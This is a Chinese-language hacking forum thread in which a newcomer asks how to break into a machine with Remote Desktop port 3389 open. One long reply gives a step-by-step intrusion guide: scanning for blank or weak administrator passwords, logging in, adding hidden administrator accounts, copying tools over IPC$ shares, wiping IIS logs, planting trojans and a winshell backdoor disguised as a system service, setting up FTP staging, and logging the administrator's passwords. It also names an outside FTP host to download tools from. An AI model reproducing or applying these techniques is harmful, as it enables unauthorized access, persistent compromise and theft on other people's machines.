论坛: 菜鸟乐园 标题: 我扫到一个3389端口 复制本贴地址    
作者: 南破王 [jacklyc]    论坛用户   登录
请问一下,我有什么办法进入他的机子.
那台机子已经打了补丁,不能用输入法进去.请问还有什么办法,或软件?

地主 发表时间: 03/06 18:41

回复: tonny [tonny888]   论坛用户   登录
猜密码了 

B1层 发表时间: 03/06 18:50

回复: 南破王 [jacklyc]   论坛用户   登录
有什么好的软件猜3389的密码吗?

B2层 发表时间: 03/06 18:54

回复: haxai [haxai]   论坛用户   登录
发杨黑客的身神,,努力

B3层 发表时间: 03/06 19:25

回复: 西门吐血 [mbmzb]   论坛用户   登录
晕---扫弱口令和开3389的直接进

B4层 发表时间: 03/10 13:04

回复: 无铭 [playopy]   论坛用户   登录
3389,不多见啊

B5层 发表时间: 03/10 13:17

回复: 无铭 [playopy]   论坛用户   登录
现在有输入法漏洞的机器已不多了,除非你遇见的是一个极不负责任的网管,呵呵!~这篇教程就是教你不用输入法漏洞就能用终端服务连接上开3389的机器,使它成为你的肉鸡。(下面的人要注意啊,不要搞国内的机器,我用来做示范的是台湾的机器,为何要用台湾的呢?等一下就知道啦)先做一下准备活动,呵呵!何为准备活动?就是找到要用的工具呀。(操作系统要求win2000/NT)
一.X-scan-v1.0,强大的扫描工具,简单易用,没有IP限制,呵呵?想到什么了?
二.WIN2000终端服务客户端(没这个怎么叫3389肉鸡呢?)
三.CleanIISLog.exe,榕哥的清日志的好东东!^o^(又买广告呢)
四.SQLEXEC.EXE
(以上软件均在本站有下载http://www.sandflee.net)
好!武器都准备好了就动手吧!
一。运行X-scan-v1.0工具包中的xscan_gui.exe,这是一个图形界面的扫描器,在“扫描设置”下选择“标准端口”;“NT弱口令用户”;“SQL-SERVER默认帐户”这三项,“运行参数”下填上你要扫描的IP地址段,例如:211.**.1.1-211.**.20.255(选的范围不要太大,要不很长时间都扫不完,也不要太少,少了可能找不到肉鸡),尽量不要选下面的“使用代理服务器”,线程要看你的网速如何,快的可以填50线程,我一般是用50的!YEAH!~~在“扫描前先PING主机”打上钩,“X-SCANNER所在位置”用默认的.\xscan.exe就可以了。再来“其他设置”下,“配置文件”处是.\dat\config.ini,点击旁边的“读取设置”,看到这个面板的框框都有东西了,就表示设置好!回到开始时的“扫描设置”面板下,点击下方的“开始扫描”。见到一个DOS窗口出来了,扫描正式开始!^O^,去泡泡MM吧,天南地北的吹一通,呵呵,看到扫描全部完成了,和你的MM说拜拜咯,开工~!!
看看扫描的报告,可能会很多的,一定要看清楚哦,要不肉鸡可能就这样给飞走啦。找找看,(主要是找有NT弱口令帐户又同时开了3389的机器)我就找到了一个例子:(不是真的哦,别照这个去试)
211.**.**.53: 【详细资料】 【主机摘要 -- 域名/主机名:"快辣侥" 操作系统:"Windows NT 5.0"】

NT弱口令帐户:1 开放端口:135,139,3389
看到了吗?NT弱口令帐户:1 开放端口:135,139,3389,!!!!!!!!!!
好了,再点“详细资料”进去看看: 
【NT弱口令用户】:


Administrator: [空口令]
帐户类型:管理员(Administrator)
最后登录时间: GMT
错误口令次数: 0次
成功登录次数: 9次
用户ID: 0x000001f4, 组ID: 0x00000201 
欢呼吧,!!!!!!!(如果看到“详细资料”里的帐户类型不是管理员的话,就找下一个吧,反正扫描报告多得很,总会找到一个的,我就试过扫描一次,就扫到了十多个这样的帐户,呵呵!~~)
知道了管理员的帐户是:Administrator,口令是空!到这时候,这台NT主机已差不多可以说是你的啦。

二.运行你的终端服务客户端,填上这个IP,按“连接”,等一下就看到了熟悉的WIN2000终端登陆界面,好,填上用户名:Administrator,口令不用填啦,按“确定”,等一下,哈哈!!!!!进去啦~~~~你会先看到一个叫你设定伺服器的画面,关掉,不要了。想干什么?首先我们为了防止管理员以后改了密码,我们先要给自己做一个管理员的帐户,点对方屏幕的开始--》程序--》附件--》命令提示符(这里的字有时是不同的,要看具体是什么系统,自己好好看看吧),依次输入:
C:\>net user owem lgg1234 /add(加入一个用户名为owem,密码:lgg1314的帐户)
指令執行成功。
C:\>net localgroup administrators owem /add(把owem加入到管理员组)
指令執行成功。
好了!到这里你已增加了一个管理员了,以后就算他把Administrator的密码改了你也可以用owem这个帐户进去耍啦,建议你先用net user看看人家的管理组有多少人,人多的话就尽管加个号吧,人少的加号时就要找一个近似于对方的名字来迷惑管理员,哈哈~`够绝了吧!
再来,在自己的命令提示符下依次输入:
D:\hacker>net use \\211.**.**.53\ipc$ "lgg1314" /user:"owem"(用IPC管道连接上去)
命令成功完成。
D:\hacker>copy CleanIISLog.exe \\211.**.**.53\c$(把CleanIISLog.exe拷到对方对方C盘下,有时会拒绝访问的,就拷到其他目录下吧)
已复制 1 个文件。
你也可以把木马拷上去,哈哈!~~~有意思!!5555555555.....
再来删除IPC的连接
D:\hacker>net use \\211.**.**.53\ipc$ /delete
\\211.**.**.53\ipc$ 已经删除。
先去看看管理员在不在,开始--》程序--》系统管理工具--》终端服务管理员,哈哈!`~没在!爽极啦,只有你一个连线!
下面该玩点什么呢?打开他的浏览器,去你知道的黑软地址下载你想用的工具,什么?装个流光?哈哈!~~`目标太大了吧?还是下个X-SCAN算了,下个IP炸弹??呵呵!好主意,`炸你的情敌去吧!用他下载的X-SCAN帮你去找更多的肉鸡!1YEAH!如果你在上面运行了程序,你退出时就只关终端窗口右上角的X就行了,关掉后你的程序还在运行呢!明天睡醒了来收你的战果吧!如果你要全部退出,就按开始--》关机--》登出****(你的帐户)。

还要补充的就是如果你扫到的是:SQL-SERVER默认帐户,没有NT管理员弱口令,但3389还是开了的话,就可以用SQLEXEC。EXE来连接上去,建立帐户也是用一样的命令,你也可以用3389登陆上去啦。

好!下课!!GOOD LOCK!


建立自己的工作鸡

当你扫到第一台肉鸡后,以后你就不用在自己的pc上扫鸡,连接肉鸡了

这样好处当然多多,最大的好处:

1,肉鸡一般不会关机,24小时为你工作
2,不容易暴露自己的ip,特别对国内机
3,可以非常方便的复制文件到其他肉鸡上

现在就讲讲我是如何建立自己的工作鸡的

1,选肉鸡(当然肉鸡不多的朋友先随便找台用用)
工作鸡一定要网速快(废话!),内存越大越好(我先一般选2g左右内存的做工作鸡)这样扫鸡系统不会慢下来,扫鸡是很耗系统资源的,看他有没有自己的网站(有网站的不选,这种鸡管理员管得多),最后看看他的上网时间显示2天以上的ok,一般100m专线的都是2天以上的

2,安装(所有文件都要安装或放在在x:/recycler或x:/recycled 垃圾桶文件夹)

安装ftp服务器端软件,我一般都用serv-u,图形界面非常容易使用,安装后建立一个anonymous用户,只给他读取权限,匿名访问用。再建立一个你上传用的用户设密码,给他执行以外的所有权限。最后建议在建一个用户目录指向x:/winnt/system32 给他全部权限(以防将来后门被删,到时用这个用户传个木马上去,你又可以控制肉鸡了),端口建议不要用默认的21容易发现。好了把你的所有工具传上去吧。访问:
ftp://ip:你的端口!忘了说,最后要到...涂床坏絪erv-u了

安装流光,xscan或WINNTAutoAttack任何一个扫描工具,我喜欢WINNTAutoAttack,虽然错误多,但速度快,一个晚上可以扫十几万个ip,肉鸡来的就快啊

安装后门,方法写过了

好了,你的工作鸡建成了,是不是扫鸡的效率高了?

累了!如何隐藏文件,不让别人入侵以后再写 
如何把肉鸡占为己有

想要完全的把肉鸡占为己有不太可能,微软产品漏洞不断的出,今天出了这个漏洞明天又有新漏洞!

我只能说一下简单的让菜鸟不能入侵的方法:

1,下载所有微软的补丁,装sp3,等等

2,更改注册表Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous = 1 来禁止139空连接,就扫不到账号了!

3,修改服务器端的终端端口设置,注册表有2个地方需要修改 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp] 
PortNumber值,默认是3389,修改成所希望的端口,比如1234 
第二个地方:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 
PortNumber值,默认是3389,修改成所希望的端口,比如1234
现在这样就可以了。重启
这样,即是被扫到了admin组用户名密码,也不能通过终端默认的3389来连接,连接的方法:ip:你设定的端口

4,关掉ipc通道,在管理工具---服务---server这一项,把他设为禁用,并停止他
这样用net命令就连接不上了

5,安装后门,万一被人入侵了或被管理员发现了就可以通过后门进入,建议用winshell,使用方法以前讲过! 
安装后门!

虽然获得管理员的帐号,但总有一天会被管理员发现有人入侵,管理员一般会用一下方法防范,修改admin密码,关掉139端口,关掉终端(3389)等等,遇到这样的情况怎么办呢?我们就要装个后门,从后门进去!

现在追常用的是winshell,我也用它

使用方法:

1,到这里 ftp://61.33.5.200:5678 ;下载解压打开,建议关掉杀毒软件,运行winshell.exe,里面有你用的端口,密码等等,改成自己用的,然后做成,我把它做成UtilMen.exe这个

2,把UtilMen.exe放到肉鸡的x:/winnt/system32

3,在注表内改HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UtilMan右边有个ImagePath把它值里面的UtilMan.exe改成UtilMen.exe

4,到管理,服务内Utility Manager找到这个服务改为自动再启动它

5,好了,你可以在你电脑上用telnet IP 端口(你的winshell端口)来连它了

最常用:
net user axin axin1234 /add 建了个AXIN的用户,密码是AXIN1234

net localgroup administrators axin /add 把AXIN这个用户提升为管理员

最后建议在下载一个pass.exe,运行他,这个纪录每次admin登陆的密码
密码在c:\winnt\temp\stconfig.ini



B6层 发表时间: 03/10 13:18

回复: laievf [laievf]   论坛用户   登录
可以用流光猜猜密码啊!~~~1放个好字典

B7层 发表时间: 03/11 07:23

回复: 小黑子 [vj110]   论坛用户   登录
其实3389
很好搞定
用流光或者别的扫描软件
在扫3389端口的同时再破弱口命,,
当扫到3389
打开的3389端口而且有弱口命的同时就会¥##¥·嘿嘿
省下的就自己慢慢爽啦,
哈哈哈

B8层 发表时间: 03/12 11:30

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号